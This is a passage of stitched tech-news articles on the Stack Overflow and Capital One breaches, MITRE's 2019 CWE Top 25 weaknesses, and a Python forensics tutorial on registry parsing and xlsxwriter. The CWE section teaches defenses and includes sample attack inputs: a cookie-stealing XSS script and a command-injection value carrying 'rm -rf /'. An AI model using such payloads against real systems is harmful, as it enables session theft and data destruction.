However, the team has identified some privileged web requests that the attacker made, which might have returned IP addresses, names, or emails of approximately 250 public network users of Stack Exchange. These affected users will be notified by Stack Overflow.

Steps taken by Stack Overflow in response to the attack

- Terminated the unauthorized access to the system.
- Conducted an extensive and detailed audit of all logs and databases that they maintain, which allowed them to trace the steps and actions that were taken.
- Remediated the original issues that allowed unauthorized access and escalation.
- Issued a public statement proactively.
- Engaged a third-party forensics and incident response firm to assist with both remediation and learnings.
- Have taken precautionary measures such as cycling secrets, resetting company passwords, and evaluating systems and security levels.

Stack Overflow has again promised to provide more public information after their investigation cycle concludes. Many developers are appreciating the quick confirmation, updates, and the response taken by Stack Overflow in this security attack incident.

https://twitter.com/PeterZaitsev/status/1129542169696657408

A user on Hacker News comments, “I think this is one of the best sets of responses to a security incident I've seen: Disclose the incident ASAP, even before all facts are known. The disclosure doesn't need to have any action items, and in this case, didn't. Add more details as the investigation proceeds, even before it fully finishes, to help clarify scope. The proactive communication and transparency could have downsides (causing undue panic), but I think these posts have presented a sense that they have it mostly under control. Of course, this is only possible because they, unlike some other companies, probably do have a good security team who caught this early. I expect the next (or perhaps the 4th) post will be a fuller post-mortem from after the incident. This series of disclosures has given me more confidence in Stack Overflow than I had before!”

Another user on Hacker News added, “Stack Overflow seems to be following a very responsible incident response procedure, perhaps instituted by their new VP of Engineering (the author of the OP). It is nice to see.”

Read More

2019 Stack Overflow survey: A quick overview

Bryan Cantrill on the changing ethical dilemmas in Software Engineering

Listen to Uber engineer Yuri Shkuro discuss distributed tracing and observability [Podcast]
Savia Lobo
30 Jul 2019
8 min read

Ex-Amazon employee hacks Capital One's firewall to access its Amazon S3 database; 100m US and 6m Canadian users affected

Update: On 28th August, an indictment was filed in a US federal district court, which mentioned Thompson allegedly hacked and stole information from an additional 30 AWS-hosted organizations and will face computer abuse charges.

Capital One Financial Corp., one of the largest banks in the United States, has been subject to a massive data breach affecting 100 million customers in the U.S. and an additional 6 million in Canada. Capital One said the hacker exploited a configuration vulnerability in its firewall that allowed access to the data. In its official statement released yesterday, Capital One revealed that on July 19, it determined an "unauthorized access by an outside individual who obtained certain types of personal information relating to people who had applied for its credit card products and to Capital One credit card customers."

Paige A. Thompson, 33, the alleged hacker who broke into the Capital One server, was arrested yesterday and appeared in federal court in Seattle. She was an ex-employee of Amazon's cloud service (AWS), Amazon confirms.

The Capital One hacker, an ex-AWS employee, “left a trail online for investigators to follow”

FBI Special Agent Joel Martini wrote in a criminal complaint filed on Monday that a “GitHub account belonging to Thompson showed that, earlier this year, someone exploited a firewall vulnerability in Capital One’s network that allowed an attacker to execute a series of commands on the bank’s servers”, according to Ars Technica. IP addresses and other evidence ultimately showed that Thompson was the person who exploited the vulnerability and posted the data to GitHub, Martini said. “Thompson allegedly used a VPN from IPredator and Tor in an attempt to cover her tracks. At the same time, Martini said that much of the evidence tying her to the intrusion came directly from things she posted to social media or put in direct messages”, Ars Technica reports.
On July 17, a tipster wrote to a Capital One security hotline, warning that some of the bank’s data appeared to have been “leaked,” the criminal complaint said. According to The New York Times, Thompson “left a trail online for investigators to follow as she boasted about the hacking, according to court documents in Seattle”. She is listed as the organizer of a group on Meetup, a social network, called Seattle Warez Kiddies, a gathering for “anybody with an appreciation for distributed systems, programming, hacking, cracking.” The F.B.I. noticed her activity on Meetup and used it to trace her other online activities, eventually linking her to posts boasting about the data theft on Twitter and the Slack messaging service. “I’ve basically strapped myself with a bomb vest, dropping capital ones dox and admitting it,” Thompson posted on Slack, prosecutors say.

Highly sensitive financial and social insurance data compromised

The stolen data was stored in Amazon S3. "An AWS spokesman confirmed that the company’s cloud had stored the Capital One data that was stolen, and said it wasn’t accessed through a breach or vulnerability in AWS systems", Bloomberg reports. Capital One said the largest category of information accessed was information on consumers and small businesses as of the time they applied for one of its credit card products, from 2005 through early 2019. The breached data included personal information Capital One routinely collects at the time it receives credit card applications, including names, addresses, zip codes/postal codes, phone numbers, email addresses, dates of birth, and self-reported income. The hacker also obtained customer status data, e.g., credit scores, credit limits, balances, payment history, and contact information, including fragments of transaction data from a total of 23 days during 2016, 2017 and 2018. For the Canadian credit card customers, approximately 1 million Social Insurance Numbers were compromised in this incident.
About 140,000 Social Security numbers of Capital One's credit card customers and about 80,000 linked bank account numbers of its secured credit card customers were compromised. Richard D. Fairbank, Capital One’s chief executive officer, said in a statement, "I am deeply sorry for what has happened. I sincerely apologize for the understandable worry this incident must be causing those affected.” Thompson is charged with computer fraud and faces a maximum penalty of five years in prison and a $250,000 fine. U.S. Magistrate Judge Mary Alice Theiler ordered Thompson to be held. A bail hearing is set for Aug 1. Capital One said it “will notify affected individuals through a variety of channels. We will make free credit monitoring and identity protection available to everyone affected”.

Capital One's justification of "Facts" is unsatisfactory

Users are very skeptical about trusting Capital One with their data going ahead. A user on Hacker News writes, “Obviously this person committed a criminal act, however, Capital One should also shoulder responsibility for not securing customer data. I have a feeling we'd be waiting a long time for accountability on C1's part.” Security experts are surprised by Capital One’s stating of “facts” that say “no Social Security numbers were breached” and say this cannot be true.

https://twitter.com/zackwhittaker/status/1156027826912428032
https://twitter.com/DavidAns/status/1156014432511643649
https://twitter.com/GossiTheDog/status/1156232048975273986

Similar to Capital One, there were other data breaches in the past where the companies agreed on a settlement to help the affected customers, like Equifax, or were levied with huge fines, like Marriott International and British Airways. The Equifax data breach that affected 143 million U.S.
consumers on September 7, 2017, resulted in a global settlement including up to $425 million to help people affected by the data breach, amounting to approximately $125 per affected victim, should they apply for compensation. This global settlement was made with the Federal Trade Commission, the Consumer Financial Protection Bureau, and 50 U.S. states and territories.

The Marriott data breach occurred in Marriott’s Starwood guest database and compromised the data of 383 million users; it was revealed on November 19, 2018. Recently, the Information Commissioner’s Office (ICO) in the UK announced its plans to impose a fine of more than £99 million ($124 million) under GDPR. The British Airways data breach compromised personal identification information of over 500,000 customers and is believed to have begun in June 2018. Early this month, the ICO also announced it will fine British Airways more than £183m.

As a major data breach in one of the largest banks, Capital One could feel the pinch from regulators soon. What sets this case apart from the above breaches is that the affected customers are from the US and Canada and not from the EU. In the absence of regulatory action by the ICO or the EU commission, it is yet to be seen if regulators in the US and Canada will rise to the challenge. Also, now that the alleged hacker has been arrested, does this mean Capital One could slip by without paying any significant fine? Only time can tell if Capital One will pay a huge sum to the regulators for not being watchful of their customers' data in two different states. If the Equifax-FTC case and the Facebook-FTC proceedings are any sign of things to come, Capital One has not much to be concerned about.

To know more about this news in detail, read Capital One’s official announcement.
Thompson faces additional charges for hacking into the AWS accounts of about 30 organizations

On 28th August, an indictment was filed in a US federal district court, where the investigators mentioned they have identified most of the companies and institutions allegedly hit by Thompson. The prosecutors said Thompson wrote software that scanned for customer accounts hosted by a “cloud computing company,” which is believed to be her former employer, AWS or Amazon Web Services.

"It is claimed she specifically looked for accounts that suffered a common security hole – specifically, a particular web application firewall misconfiguration – and exploited this weakness to hack into the AWS accounts of some 30 organizations, and siphon their data to her personal server. She also used the hacked cloud-hosted systems to mine cryptocurrency for herself, it is alleged," The Register reports.

“The object of the scheme was to exploit the fact that certain customers of the cloud computing company had misconfigured web application firewalls on the servers that they rented or contracted from the cloud computing company,” the indictment reads. The indictment further reads, “The object was to use that misconfiguration in order to obtain credentials for accounts of those customers that had permission to view and copy data stored by the customers on their cloud computing company servers. The object then was to use those stolen credentials in order to access and copy other data stored by the customers.”

Thus, she also faces a computer abuse charge over the 30 other AWS-hosted organizations she allegedly hacked and stole information from.

Facebook fails to fend off a lawsuit over a data breach of nearly 30 million users

US Customs and Border Protection reveal data breach that exposed thousands of traveler photos and license plate images

Over 19 years of ANU (Australian National University) students’ and staff data breached
Savia Lobo
19 Sep 2019
10 min read

MITRE’s 2019 CWE Top 25 most dangerous software errors list released

Two days ago, the Cybersecurity and Infrastructure Security Agency (CISA) announced MITRE’s 2019 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Errors list. This list is a compilation of the most frequent and critical errors that can lead to serious vulnerabilities in software.

To aggregate the data for this list, the CWE Team used a data-driven approach that leverages published Common Vulnerabilities and Exposures (CVE®) data and related CWE mappings found within the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD), as well as the Common Vulnerability Scoring System (CVSS) scores associated with the CVEs. The team then applied a scoring formula (elaborated in later sections) to determine the level of prevalence and danger each weakness presents. This Top 25 list draws on NVD data from the years 2017 and 2018, which consisted of approximately twenty-five thousand CVEs.

The previous SANS/CWE Top 25 list was released in 2011, and the major difference between the 2011 list and the current 2019 one is the approach used. In 2011, the data was constructed using surveys and personal interviews with developers, top security analysts, researchers, and vendors. These responses were normalized based on prevalence and ranked by the CWSS methodology. The 2019 CWE Top 25, in contrast, was formed based on the real-world vulnerabilities found in NVD data.

CWE Top 25 dangerous software errors developers should watch out for

Improper Restriction of Operations within the Bounds of a Memory Buffer

In this error (CWE-119), the software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer.
The likelihood of exploit of this error is high, as an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash. This error can be exploited in any programming language without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

With this error (CWE-79), the software does not correctly neutralize user-controllable input before it is placed in output that is used as a web page served to other users. Once a malicious script is injected, the attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. This error can also allow attackers to send malicious requests to a website on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Such XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid.

Improper Input Validation

With this error (CWE-20), the product does not validate, or incorrectly validates, input that affects the control flow or data flow of a program. This can allow an attacker to craft the input in a form that is not expected by the rest of the application. This will lead to parts of the system receiving unintended input, which may result in an altered control flow, arbitrary control of a resource, or arbitrary code execution. Input validation is problematic in any system that receives data from an external source.
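The XSS pattern (CWE-79) comes down to emitting untrusted input without neutralization. As a rough illustration (not taken from the CWE report; the function names and payload are made up), here is the weakness next to its usual fix, escaping output with Python's standard html module:

```python
import html

def render_comment_unsafe(comment: str) -> str:
    # CWE-79: untrusted input is placed in the page without neutralization
    return "<p>" + comment + "</p>"

def render_comment_safe(comment: str) -> str:
    # Escaping turns markup characters into entities, so the browser
    # renders the payload as text instead of executing it
    return "<p>" + html.escape(comment) + "</p>"

payload = "<script>steal(document.cookie)</script>"
print(render_comment_unsafe(payload))  # the script tag reaches the browser intact
print(render_comment_safe(payload))    # &lt;script&gt;... is displayed, not executed
```

Escaping at output time is also why proper input validation (CWE-20) can indirectly blunt this class of attack: it keeps special characters from ever reaching the page generation step.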
“CWE-116 [Improper Encoding or Escaping of Output] and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message,” the researchers mention in the CWE definition post.

Information Exposure

This error (CWE-200) is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. According to the CWE Individual Dictionary Definition, “Many information exposures are resultant (e.g. PHP script error revealing the full path of the program), but they can also be primary (e.g. timing discrepancies in cryptography). There are many different types of problems that involve information exposures. Their severity can range widely depending on the type of information that is revealed.” This error can occur in specific named languages, operating systems, architectures, paradigms (mobile), technologies, or a class of such platforms.

Out-of-bounds Read

In this error (CWE-125), the software reads data past the end, or before the beginning, of the intended buffer. This can allow attackers to read sensitive information from other memory locations or cause a crash. The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. This error may occur in specific named languages (C, C++), operating systems, architectures, paradigms, technologies, or a class of such platforms.

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

In this error (weakness ID: CWE-89), the software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
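The mechanics of CWE-89 are easiest to see next to the fix. A minimal sketch using Python's built-in sqlite3 module (the table and data are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 0), ('bob', 1)")

def find_user_unsafe(name):
    # CWE-89: externally-influenced input is concatenated into the command,
    # so special characters in `name` become part of the SQL syntax
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()

def find_user_safe(name):
    # A parameterized query keeps the input as data, never as SQL syntax
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()

payload = "x' OR '1'='1"
print(find_user_unsafe(payload))  # every row comes back: the WHERE check is bypassed
print(find_user_safe(payload))    # no rows: the payload is treated as a literal name
```

With the parameterized version, the payload can never change the query's structure, which is exactly the neutralization of "special elements" the CWE entry describes.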
This error can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including the execution of system commands. It can occur in specific named languages, operating systems, architectures, paradigms, technologies, or a class of such platforms.

Cross-Site Request Forgery (CSRF)

In this error (CWE-352), the web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. This might allow an attacker to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. The likelihood of the occurrence of this error is medium. This can be done via a URL, image load, XMLHttpRequest, etc., and can result in the exposure of data or unintended code execution.

Integer Overflow or Wraparound

In this error (CWE-190), the software performs a calculation that can produce an integer overflow or wraparound when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In this error (CWE-22), the software uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory. However, the software does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside of the restricted directory. In most programming languages, injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack.
For example, when the software adds ".txt" to any pathname, this may limit the attacker to text files, but a null injection may effectively remove this restriction.

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In this error (CWE-78), the software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize, or incorrectly neutralizes, special elements that could modify the intended OS command when it is sent to a downstream component. This error can allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have.

The researchers write, “More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88).
Equivalent distinctions may exist in other injection-related problems such as SQL injection.”

Here’s the list of the remaining errors from MITRE’s 2019 CWE Top 25 list, with each weakness's score from the ranking methodology:

- CWE-416: Use After Free (17.94)
- CWE-287: Improper Authentication (10.78)
- CWE-476: NULL Pointer Dereference (9.74)
- CWE-732: Incorrect Permission Assignment for Critical Resource (6.33)
- CWE-434: Unrestricted Upload of File with Dangerous Type (5.50)
- CWE-611: Improper Restriction of XML External Entity Reference (5.48)
- CWE-94: Improper Control of Generation of Code ('Code Injection') (5.36)
- CWE-798: Use of Hard-coded Credentials (5.1)
- CWE-400: Uncontrolled Resource Consumption (5.04)
- CWE-772: Missing Release of Resource after Effective Lifetime (5.04)
- CWE-426: Untrusted Search Path (4.40)
- CWE-502: Deserialization of Untrusted Data (4.30)
- CWE-269: Improper Privilege Management (4.23)
- CWE-295: Improper Certificate Validation (4.06)

To know about the other errors in detail, read CWE’s official report.

Scoring formula to calculate the rank of weaknesses

The CWE team developed a scoring formula to calculate a rank order of weaknesses. The scoring formula combines the frequency with which a CWE is the root cause of a vulnerability with the projected severity of its exploitation. In both cases, the frequency and severity are normalized relative to the minimum and maximum values seen. A few properties of the scoring method include:

- Weaknesses that are rarely exploited will not receive a high score, regardless of the typical severity associated with any exploitation. This makes sense, since if developers are not making a particular mistake, then the weakness should not be highlighted in the CWE Top 25.
- Weaknesses with a low impact will not receive a high score. This again makes sense, since the inability to cause significant harm by exploiting a weakness means that weakness should be ranked below those that can.
- Weaknesses that are both common and can cause harm should receive a high score.
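The normalize-and-multiply idea behind this scoring can be sketched in a few lines of Python. The data here is made up for illustration; the real computation runs over roughly 25,000 NVD entries, and the exact formula is in MITRE's methodology notes:

```python
def normalize(value, lo, hi):
    # Min-max normalization: maps the observed range onto [0, 1]
    return (value - lo) / (hi - lo)

def cwe_score(freq, avg_cvss, all_freqs, all_cvss):
    # Frequency: how often the CWE is the root cause of a CVE in the dataset.
    # Severity: the average CVSS of those CVEs. Both are normalized relative
    # to the min/max seen, then multiplied and scaled to a 0-100 score.
    fr = normalize(freq, min(all_freqs), max(all_freqs))
    sv = normalize(avg_cvss, min(all_cvss), max(all_cvss))
    return round(fr * sv * 100, 2)

# Hypothetical dataset: (frequency in NVD, average CVSS) per weakness
data = {"CWE-A": (3000, 8.2), "CWE-B": (400, 9.1), "CWE-C": (50, 4.0)}
freqs = [f for f, _ in data.values()]
cvss = [c for _, c in data.values()]
for cwe, (f, c) in data.items():
    print(cwe, cwe_score(f, c, freqs, cvss))
```

In this toy dataset, the rare-but-severe weakness and the common-but-mild one both score well below the weakness that is common and severe, which is exactly the property the list's authors describe.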
However, there are a few limitations to the methodology of the data-driven approach chosen by the CWE team.

Limitations of the data-driven methodology

- The approach only uses data publicly reported and captured in NVD, while numerous vulnerabilities exist that do not have CVE IDs. Vulnerabilities not included in NVD are therefore excluded from this approach.
- For vulnerabilities that receive a CVE, there is often not enough information to make an accurate (or precise) identification of the appropriate CWE being exploited.
- There is an inherent bias in the CVE/NVD dataset due to the set of vendors that report vulnerabilities and the languages those vendors use. If one of the largest contributors to CVE/NVD primarily uses C as its programming language, the weaknesses that often exist in C programs are more likely to appear.
- Another bias in the CVE/NVD dataset is that most vulnerability researchers and/or detection tools are very proficient at finding certain weaknesses but not others. Weakness types that researchers and tools struggle to find end up being under-represented within the 2019 CWE Top 25.
- Gaps or perceived mischaracterizations of the CWE hierarchy itself lead to incorrect mappings.
- The metric also carries a bias that indirectly prioritizes implementation flaws over design flaws, due to their prevalence within individual software packages. For example, a web application may have many different cross-site scripting (XSS) vulnerabilities due to a large attack surface, yet only one instance of the use of an insecure cryptographic algorithm.

https://twitter.com/mattfahrner/status/1173984732926943237

To know more about this CWE Top 25 list in detail, head over to MITRE's CWE Top 25 official page.
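To make the top-ranked injection weaknesses concrete, here is a minimal sketch (not from the report) contrasting a CWE-78-style command construction with a safer pattern; the `cat` command and filenames are just illustrative.

```python
import shlex

def vulnerable(filename):
    # CWE-78: attacker-controlled input is pasted into a shell command string,
    # so input such as "a.txt; rm -rf /" smuggles in a second command.
    return "cat " + filename

def safer(filename):
    # An argument list (executed without a shell, e.g. via subprocess.run)
    # keeps shell metacharacters inert.
    return ["cat", filename]

payload = "a.txt; rm -rf /"
print(vulnerable(payload))   # the whole payload becomes shell syntax
print(safer(payload))        # the payload stays a single argument
print(shlex.quote(payload))  # quoting neutralizes it when a shell is unavoidable
```

The same neutralization principle (treat input as data, never as command syntax) underlies the defenses for SQL injection and XSS as well.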
Other news in Security

- LastPass patched a security vulnerability from the extensions generated on pop-up windows
- An unsecured Elasticsearch database exposes personal information of 20 million Ecuadoreans including 6.77M children under 18
- A new Stuxnet-level vulnerability named Simjacker used to secretly spy over mobile phones in multiple countries for over 2 years: Adaptive Mobile Security reports
Savia Lobo
07 Aug 2019
5 min read
Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator

Last week, Capital One revealed it was subject to a major data breach due to a configuration vulnerability in its firewall that allowed access to its Amazon S3 database, affecting 106 million users in the US and Canada. A week after the breach, not only Capital One but also GitHub and Amazon are facing scrutiny for their inadvertent roles in the breach.

Capital One and GitHub sued in California

Last week, the law firm Tycko & Zavareei LLP filed a lawsuit in California's federal district court on behalf of their plaintiffs, Seth Zielicke and Aimee Aballo. Both plaintiffs claim Capital One and GitHub failed to protect users' personal data. The complaint highlights that Paige A. Thompson, the alleged hacker, stole the data in March and posted about the theft on GitHub in April. According to the lawsuit, "As a result of GitHub's failure to monitor, remove, or otherwise recognize and act upon obviously-hacked data that was displayed, disclosed, and used on or by GitHub and its website, the Personal Information sat on GitHub.com for nearly three months." The law firm also alleged that, with the help of computer logs, Capital One should have known about the data breach when the information was first stolen in March. They "criticized Capital One for not taking action to respond to the breach until last month," The Hill reports. The lawsuit also alleges that GitHub "encourages (at least) friendly hacking." "GitHub had an obligation, under California law, to keep off (or to remove from) its site Social Security numbers and other Personal Information," the lawsuit further mentions. According to Newsweek, GitHub also violated the federal Wiretap Act, "which permits civil recovery for those whose 'wire, oral, or electronic communication' has been 'intercepted, disclosed, or intentionally used' in violation of, inter alia, the Wiretap Act."
A GitHub spokesperson told Newsweek, "GitHub promptly investigates content, once it's reported to us, and removes anything that violates our Terms of Service." "The file posted on GitHub in this incident did not contain any Social Security numbers, bank account information, or any other reportedly stolen personal information. We received a request from Capital One to remove content containing information about the methods used to steal the data, which we took down promptly after receiving their request," the spokesperson further added. On 30th July, New York Attorney General, Letitia James also announced that her office is opening an investigation into the Capital One data breach. “My office will begin an immediate investigation into Capital One’s breach, and will work to ensure that New Yorkers who were victims of this breach are provided relief. We cannot allow hacks of this nature to become every day occurrences,” James said in a statement. Many are confused about why a lawsuit was filed against GitHub as they believe that GitHub is not at fault. Tony Webster, a journalist, and a public records researcher tweeted, “I genuinely can't tell if this lawsuit is incompetence or malice. GitHub owed no duty to CapitalOne customers. This would be like suing a burglar's landlord because they didn't detect and stop their tenant from selling your stolen TV from their apartment.” https://twitter.com/rickhholland/status/1157658909563379713 https://twitter.com/NSQE/status/1157479467805057024 https://twitter.com/xxdesmus/status/1157679112699277312 A user on HackerNews writes, “This is incredible: they're suggesting that, in the same way that YouTube has content moderators, GitHub should moderate every repository that has a 9-digit sequence. 
They also say that GitHub "promotes hacking" without any nuance regarding modern usage of the word, and they claim that GitHub had a "duty" to put processes in place to monitor submitted content, and that by not having such processes it was in violation of its own terms of service. I hope that this gets thrown out. If not, it could have severe consequences for any site hosting user-generated content." Read the lawsuit to know more about this news in detail.

U.S. Senator's letter to Amazon CEO raises questions on the security of AWS products

Yesterday, Senator Ron Wyden wrote to Amazon's CEO, Jeff Bezos, "requesting details about the security of Amazon's cloud service", the Wall Street Journal reports. The letter puts forth questions to understand how the configuration error occurred and what measures Amazon is taking to protect its customers. The Journal reported that "more than 800 Amazon users were found vulnerable to a similar configuration error, according to a partial scan of cloud users, conducted in February by a security researcher." According to the Senator's letter, "When a major corporation loses data on a hundred million Americans because of a configuration error, attention naturally focuses on that corporation's cybersecurity practices." "However, if several organizations all make similar configuration errors, it is time to ask whether the underlying technology needs to be made safer and whether the company that makes it shares responsibility for the breaches," the letter further mentions. Jeff Bezos has been asked to reply to these questions by August 13, 2019. "Amazon has said that its cloud products weren't the cause of the breach and that it provides tools to alert customers when data is being improperly accessed," WSJ reports. Capital One did not comment on this news. Read the complete letter to know more in detail.

- U.S. Senator introduces a bill that levies jail time and hefty fines for companies violating data breaches
- Facebook fails to fend off a lawsuit over data breach of nearly 30 million users
- Equifax breach victims may not even get the promised $125; FTC urges them to opt for 10-year free credit monitoring services
Packt
14 Apr 2016
12 min read
Using the Registry and xlsxwriter modules

In this article by Chapin Bryce and Preston Miller, the authors of Learning Python for Forensics, we will learn about the features offered by the Registry and xlsxwriter modules. (For more resources related to this topic, see here.)

Working with the Registry module

The Registry module, developed by Willi Ballenthin, can be used to obtain keys and values from registry hives. Python provides a built-in registry module called _winreg; however, this module only works on Windows machines. The _winreg module interacts with the registry on the system running the module and does not support opening external registry hives. The Registry module allows us to interact with supplied registry hives and can be run on non-Windows machines. The Registry module can be downloaded from https://github.com/williballenthin/python-registry. Click on the releases section to see a list of all the stable versions and download the latest version. For this article, we use version 1.1.0. Once the archived file is downloaded and extracted, we can run the included setup.py file to install the module. In a command prompt, execute the following in the module's top-level directory:

```
python setup.py install
```

This should install the Registry module successfully on your machine. We can confirm this by opening the Python interactive prompt and typing import Registry; we will receive an error if the module is not installed successfully. With the Registry module installed, let's begin to learn how we can leverage it for our needs. First, we need to import the Registry class from the Registry module. Then, we use the Registry function to open the registry object that we want to query. Next, we use the open() method to navigate to our key of interest. In this case, we are interested in the RecentDocs registry key.
This key contains recent active files separated by extension, as shown:

```python
>>> from Registry import Registry
>>> reg = Registry.Registry('NTUSER.DAT')
>>> recent_docs = reg.open('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs')
```

If we print the recent_docs variable, we can see that it contains 11 values with five subkeys, which may contain additional values and subkeys. Additionally, we can use the timestamp() method to see the last written time of the registry key.

```python
>>> print recent_docs
Registry Key CMI-CreateHive{B01E557D-7818-4BA7-9885-E6592398B44E}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs with 11 values and 5 subkeys
>>> print recent_docs.timestamp() # Last Written Time
2012-04-23 09:34:12.099998
```

We can iterate over the values in the recent_docs key using the values() function in a for loop. For each value, we can access the name(), value(), raw_data(), value_type(), and value_type_str() methods. The value() and raw_data() methods represent the data in different ways: we use raw_data() when we want to work with the underlying binary data and value() to gather an interpreted result. The value_type() and value_type_str() functions display a number or string that identifies the type of data, such as REG_BINARY, REG_DWORD, REG_SZ, and so on.

```python
>>> for i, value in enumerate(recent_docs.values()):
...     print '{}) {}: {}'.format(i, value.name(), value.value())
...
0) MRUListEx: ????
1) 0: myDocument.docx
2) 4: oldArchive.zip
3) 2: Salaries.xlsx
...
```

Another useful feature of the Registry module is the means provided for querying for a certain subkey or value, via the subkey(), value(), or find_key() functions. A RegistryKeyNotFoundException is generated when a subkey is not present while using the subkey() function:

```python
>>> if recent_docs.subkey('.docx'):
...     print 'Found docx subkey.'
...
Found docx subkey.
>>> if recent_docs.subkey('.1234abcd'):
...     print 'Found 1234abcd subkey.'
...
```
```
Registry.Registry.RegistryKeyNotFoundException: ...
```

The find_key() function takes a path and can find a subkey through multiple levels, whereas the subkey() and value() functions only search child elements. We can use these functions to confirm that a key or value exists before trying to navigate to it. If a particular key or value cannot be found, a custom exception from the Registry module is raised; be sure to add error handling to catch this error and alert the user that the key was not discovered. With the Registry module, finding keys and their values becomes straightforward. However, when the values are not strings and are instead binary data, we have to rely on another module to make sense of the mess. For all binary needs, the struct module is an excellent candidate.

Creating Spreadsheets with the xlsxwriter Module

xlsxwriter is a useful third-party module that writes Excel output. There is a plethora of Excel-supported modules for Python, but we chose this one because it is highly robust and well-documented. As the name suggests, this module can only be used to write Excel spreadsheets. The xlsxwriter module supports cell and conditional formatting, charts, tables, filters, and macros, among others.

Adding data to a spreadsheet

Let's quickly create a script called simplexlsx.v1.py for this example. On lines 1 and 2, we import the xlsxwriter and datetime modules. The data we are going to be plotting, including the header column, is stored as nested lists in the school_data variable. Each list is a row of information that we want to store in the output Excel sheet, with the first element containing the column names.
```
001 import xlsxwriter
002 from datetime import datetime
003
004 school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'],
005     ['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
006     ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
007     ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
008     ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]
```

The writeXLSX() function, defined on line 11, is responsible for writing our data into a spreadsheet. First, we must create our Excel spreadsheet using the Workbook() function, supplying the desired name of the file. On line 13, we create a worksheet using the add_worksheet() function. This function can take the desired title of the worksheet or use the default name 'Sheet N', where N is the specific sheet number.

```
011 def writeXLSX(data):
012     workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
013     main_sheet = workbook.add_worksheet('MySheet')
```

The date_format variable stores a custom number format that we will use to display our datetime objects in the desired format. On line 17, we begin to enumerate through our data to write. The conditional on line 18 handles the header column, which is the first list encountered. We use the write() function and supply a numerical row and column. Alternatively, we can also use Excel notation, i.e. A1.

```
015     date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})
016
017     for i, entry in enumerate(data):
018         if i == 0:
019             main_sheet.write(i, 0, entry[0])
020             main_sheet.write(i, 1, entry[1])
021             main_sheet.write(i, 2, entry[2])
022             main_sheet.write(i, 3, entry[3])
```

The write() method will try to write the appropriate type for an object when it can detect the type. However, we can use different write methods to specify the correct format. These specialized writers preserve the data type in Excel so that we can use the appropriate data-type-specific Excel functions for the object.
Since we know the data types within the entry list, we can manually specify when to use the general write() function or the specific write_number() function.

```
023         else:
024             main_sheet.write(i, 0, entry[0])
025             main_sheet.write_number(i, 1, entry[1])
026             main_sheet.write_number(i, 2, entry[2])
```

For the fourth entry in the list, the datetime object, we supply the write_datetime() function with our date_format defined on line 15. After our data is written to the workbook, we use the close() function to close and save our data. On line 32, we call the writeXLSX() function, passing it the school_data list we built earlier.

```
027             main_sheet.write_datetime(i, 3, entry[3], date_format)
028
029     workbook.close()
030
031
032 writeXLSX(school_data)
```

A table of write functions and the objects they preserve is presented below:

| Function | Supported Objects |
| --- | --- |
| write_string | str |
| write_number | int, float, long |
| write_datetime | datetime objects |
| write_boolean | bool |
| write_url | str |

When the script is invoked at the command line, a spreadsheet called MyWorkbook.xlsx is created. When we convert this to a table, we can sort it according to any of our values. Had we failed to preserve the data types, values such as our dates might be identified as non-number types and prevent us from sorting them appropriately.

Building a table

Being able to write data to an Excel file and preserve the object type is a step up over CSV, but we can do better. Often, the first thing an examiner will do with an Excel spreadsheet is convert the data into a table and begin the frenzy of sorting and filtering. We can convert our data range to a table. In fact, writing a table with xlsxwriter is arguably easier than writing each row individually. The following code will be saved into the file simplexlsx.v2.py. For this iteration, we have removed the initial list in the school_data variable that contained the header information. Our new writeXLSX() function writes the header separately.
```
004 school_data = [['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
